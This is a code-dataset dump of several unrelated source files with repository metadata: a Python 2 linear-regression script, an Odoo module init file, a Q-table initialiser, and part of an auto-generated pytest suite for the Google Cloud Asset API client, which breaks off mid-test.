points.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
results.append(float(words[2]))
else:
validationPoints.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
validationResults.append(float(words[2]))
inputData.close()
print len(points)
print len(results)
print len(validationPoints)
print len(validationResults)
#print points
#print results
weights = linearRegression(points, results)
print "E: use k = 7"
print "W: ", weights
#print validationPoints
#print validationResults
eIn = calcEin(validationPoints, validationResults, weights)
print "Ein: ", eIn
outPoints = []
outResults = []
outData = open('out.dta', 'r')
for line in outData:
#print line
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
outPoints.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
outResults.append(float(words[2]))
outData.close()
eOut = calcEin(outPoints, outResults, weights)
print "Eout: ", eOut
calculateA()
calculateB()
calculateC()
calculateD()
calculateE()
#print outPoints
#print outResults
"""
results = 0.0
outResults = 0.0
for i in range(1000):
(result, outCounter) = regression(N)
results += result
outResults += outCounter
print "FINAL Ein"
print results / 1000
print "FINAL Eout"
print outResults / 1000
"""
"""
iterations = 0.0
miss = 0.0
for i in range(1000):
numIterations, misses = PLA()
iterations += numIterations
miss += misses
print i
avg = iterations/1000
avgMiss = miss / 1000
print "AVG:", avg
print "AVG MISS: ", avgMiss
""" | [
"="
] | = |
3423017cde1fa95647f30b289fef5e2249c48c80 | 25114b282d36bf67448582fa73eb50ee350c4da7 | /multicolor_backend_theme/__init__.py | aa487b80d227678e989bbb6cdf900a094b116d0e | [] | no_license | inst-sol4u/CybroAddons | 7b888628e1a1bdc21eee3c82f0c975271cc5f238 | 39a50294785209c4964f5925d7129bdc9d4af4e4 | refs/heads/14.0 | 2023-08-18T11:51:45.494958 | 2021-09-24T09:50:43 | 2021-09-24T09:50:43 | 372,519,765 | 0 | 0 | null | 2021-05-31T13:40:19 | 2021-05-31T13:40:19 | null | UTF-8 | Python | false | false | 992 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# Cybrosys Technologies Pvt. Ltd.
#
# Copyright (C) 2020-TODAY Cybrosys Technologies(<https://www.cybrosys.com>).
# Author: Cybrosys Techno Solutions (<https://www.cybrosys.com>)
# you can modify it under the terms of the GNU LESSER
# GENERAL PUBLIC LICENSE (AGPL v3), Version 3.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU LESSER GENERAL PUBLIC LICENSE (AGPL v3) for more details.
#
# You should have received a copy of the GNU LESSER GENERAL PUBLIC LICENSE
# GENERAL PUBLIC LICENSE (AGPL v3) along with this program.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import models
from . import controllers
| [
"[email protected]"
] | |
a7ea9d535013853895485bb04c94a3fbfcc123c2 | 7fc03f7d28ea7bbdca650a51a23fc0b13cbefde1 | /reinforcement_learning/0x00-q_learning/1-q_init.py | d42a24aba80da020f4cb8c8a81a025823604dba3 | [] | no_license | HeimerR/holbertonschool-machine_learning | 54c410e40d38635de482773f15e26ce1c2c95e46 | e10b4e9b6f3fa00639e6e9e5b35f0cdb43a339a3 | refs/heads/master | 2021-07-24T09:33:25.833269 | 2021-01-14T00:21:45 | 2021-01-14T00:21:45 | 236,603,791 | 0 | 6 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | #!/usr/bin/env python3
""" Initialize Q-table """
import numpy as np
def q_init(env):
""" initializes the Q-table
- env is the FrozenLakeEnv instance
Returns: the Q-table as a numpy.ndarray of zeros
"""
action_space_size = env.action_space.n
state_space_size = env.observation_space.n
q_table = np.zeros((state_space_size, action_space_size))
return q_table
| [
"[email protected]"
] | |
10778c9059cfa6f612f36c918719dfe2545ca72a | c16ea32a4cddb6b63ad3bacce3c6db0259d2bacd | /google/cloud/asset/v1/asset-v1-py/tests/unit/gapic/asset_v1/test_asset_service.py | deb23fdbb57c40a7e82e84f0631510dfa2f774ef | [
"Apache-2.0"
] | permissive | dizcology/googleapis-gen | 74a72b655fba2565233e5a289cfaea6dc7b91e1a | 478f36572d7bcf1dc66038d0e76b9b3fa2abae63 | refs/heads/master | 2023-06-04T15:51:18.380826 | 2021-06-16T20:42:38 | 2021-06-16T20:42:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152,276 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import packaging.version
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import future
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import operation_async # type: ignore
from google.api_core import operations_v1
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.asset_v1.services.asset_service import AssetServiceAsyncClient
from google.cloud.asset_v1.services.asset_service import AssetServiceClient
from google.cloud.asset_v1.services.asset_service import pagers
from google.cloud.asset_v1.services.asset_service import transports
from google.cloud.asset_v1.services.asset_service.transports.base import _API_CORE_VERSION
from google.cloud.asset_v1.services.asset_service.transports.base import _GOOGLE_AUTH_VERSION
from google.cloud.asset_v1.types import asset_service
from google.cloud.asset_v1.types import assets
from google.longrunning import operations_pb2
from google.oauth2 import service_account
from google.protobuf import duration_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from google.type import expr_pb2 # type: ignore
import google.auth
# TODO(busunkim): Once google-api-core >= 1.26.0 is required:
# - Delete all the api-core and auth "less than" test cases
# - Delete these pytest markers (Make the "greater than or equal to" tests the default).
requires_google_auth_lt_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"),
reason="This test requires google-auth < 1.25.0",
)
requires_google_auth_gte_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"),
reason="This test requires google-auth >= 1.25.0",
)
requires_api_core_lt_1_26_0 = pytest.mark.skipif(
packaging.version.parse(_API_CORE_VERSION) >= packaging.version.parse("1.26.0"),
reason="This test requires google-api-core < 1.26.0",
)
requires_api_core_gte_1_26_0 = pytest.mark.skipif(
packaging.version.parse(_API_CORE_VERSION) < packaging.version.parse("1.26.0"),
reason="This test requires google-api-core >= 1.26.0",
)
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert AssetServiceClient._get_default_mtls_endpoint(None) is None
assert AssetServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert AssetServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
assert AssetServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
assert AssetServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
assert AssetServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [
AssetServiceClient,
AssetServiceAsyncClient,
])
def test_asset_service_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'cloudasset.googleapis.com:443'
@pytest.mark.parametrize("client_class", [
AssetServiceClient,
AssetServiceAsyncClient,
])
def test_asset_service_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'cloudasset.googleapis.com:443'
def test_asset_service_client_get_transport_class():
transport = AssetServiceClient.get_transport_class()
available_transports = [
transports.AssetServiceGrpcTransport,
]
assert transport in available_transports
transport = AssetServiceClient.get_transport_class("grpc")
assert transport == transports.AssetServiceGrpcTransport
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(AssetServiceClient, transports.AssetServiceGrpcTransport, "grpc"),
(AssetServiceAsyncClient, transports.AssetServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
@mock.patch.object(AssetServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AssetServiceClient))
@mock.patch.object(AssetServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AssetServiceAsyncClient))
def test_asset_service_client_client_options(client_class, transport_class, transport_name):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(AssetServiceClient, 'get_transport_class') as gtc:
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials()
)
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(AssetServiceClient, 'get_transport_class') as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
with pytest.raises(ValueError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name,use_client_cert_env", [
(AssetServiceClient, transports.AssetServiceGrpcTransport, "grpc", "true"),
(AssetServiceAsyncClient, transports.AssetServiceGrpcAsyncIOTransport, "grpc_asyncio", "true"),
(AssetServiceClient, transports.AssetServiceGrpcTransport, "grpc", "false"),
(AssetServiceAsyncClient, transports.AssetServiceGrpcAsyncIOTransport, "grpc_asyncio", "false"),
])
@mock.patch.object(AssetServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AssetServiceClient))
@mock.patch.object(AssetServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AssetServiceAsyncClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_asset_service_client_mtls_env_auto(client_class, transport_class, transport_name, use_client_cert_env):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch('google.auth.transport.mtls.has_default_client_cert_source', return_value=True):
with mock.patch('google.auth.transport.mtls.default_client_cert_source', return_value=client_cert_source_callback):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch("google.auth.transport.mtls.has_default_client_cert_source", return_value=False):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(AssetServiceClient, transports.AssetServiceGrpcTransport, "grpc"),
(AssetServiceAsyncClient, transports.AssetServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_asset_service_client_client_options_scopes(client_class, transport_class, transport_name):
# Check the case scopes are provided.
options = client_options.ClientOptions(
scopes=["1", "2"],
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(AssetServiceClient, transports.AssetServiceGrpcTransport, "grpc"),
(AssetServiceAsyncClient, transports.AssetServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_asset_service_client_client_options_credentials_file(client_class, transport_class, transport_name):
# Check the case credentials file is provided.
options = client_options.ClientOptions(
credentials_file="credentials.json"
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_asset_service_client_client_options_from_dict():
with mock.patch('google.cloud.asset_v1.services.asset_service.transports.AssetServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = AssetServiceClient(
client_options={'api_endpoint': 'squid.clam.whelk'}
)
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_export_assets(transport: str = 'grpc', request_type=asset_service.ExportAssetsRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.export_assets),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.export_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ExportAssetsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_export_assets_from_dict():
test_export_assets(request_type=dict)
def test_export_assets_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.export_assets),
'__call__') as call:
client.export_assets()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ExportAssetsRequest()
@pytest.mark.asyncio
async def test_export_assets_async(transport: str = 'grpc_asyncio', request_type=asset_service.ExportAssetsRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.export_assets),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.export_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ExportAssetsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_export_assets_async_from_dict():
await test_export_assets_async(request_type=dict)
def test_export_assets_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.ExportAssetsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.export_assets),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.export_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_export_assets_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.ExportAssetsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.export_assets),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.export_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_list_assets(transport: str = 'grpc', request_type=asset_service.ListAssetsRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.ListAssetsResponse(
next_page_token='next_page_token_value',
)
response = client.list_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ListAssetsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListAssetsPager)
assert response.next_page_token == 'next_page_token_value'
def test_list_assets_from_dict():
test_list_assets(request_type=dict)
def test_list_assets_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
client.list_assets()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ListAssetsRequest()
@pytest.mark.asyncio
async def test_list_assets_async(transport: str = 'grpc_asyncio', request_type=asset_service.ListAssetsRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(asset_service.ListAssetsResponse(
next_page_token='next_page_token_value',
))
response = await client.list_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ListAssetsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListAssetsAsyncPager)
assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_list_assets_async_from_dict():
await test_list_assets_async(request_type=dict)
def test_list_assets_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.ListAssetsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
call.return_value = asset_service.ListAssetsResponse()
client.list_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_list_assets_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.ListAssetsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.ListAssetsResponse())
await client.list_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_list_assets_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.ListAssetsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_assets(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
def test_list_assets_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_assets(
asset_service.ListAssetsRequest(),
parent='parent_value',
)
@pytest.mark.asyncio
async def test_list_assets_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.ListAssetsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.ListAssetsResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_assets(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_list_assets_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_assets(
asset_service.ListAssetsRequest(),
parent='parent_value',
)
def test_list_assets_pager():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
assets.Asset(),
],
next_page_token='abc',
),
asset_service.ListAssetsResponse(
assets=[],
next_page_token='def',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
],
next_page_token='ghi',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('parent', ''),
)),
)
pager = client.list_assets(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, assets.Asset)
for i in results)
def test_list_assets_pages():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
assets.Asset(),
],
next_page_token='abc',
),
asset_service.ListAssetsResponse(
assets=[],
next_page_token='def',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
],
next_page_token='ghi',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
],
),
RuntimeError,
)
pages = list(client.list_assets(request={}).pages)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_assets_async_pager():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
assets.Asset(),
],
next_page_token='abc',
),
asset_service.ListAssetsResponse(
assets=[],
next_page_token='def',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
],
next_page_token='ghi',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
],
),
RuntimeError,
)
async_pager = await client.list_assets(request={},)
assert async_pager.next_page_token == 'abc'
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, assets.Asset)
for i in responses)
@pytest.mark.asyncio
async def test_list_assets_async_pages():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
assets.Asset(),
],
next_page_token='abc',
),
asset_service.ListAssetsResponse(
assets=[],
next_page_token='def',
),
asset_service.ListAssetsResponse(
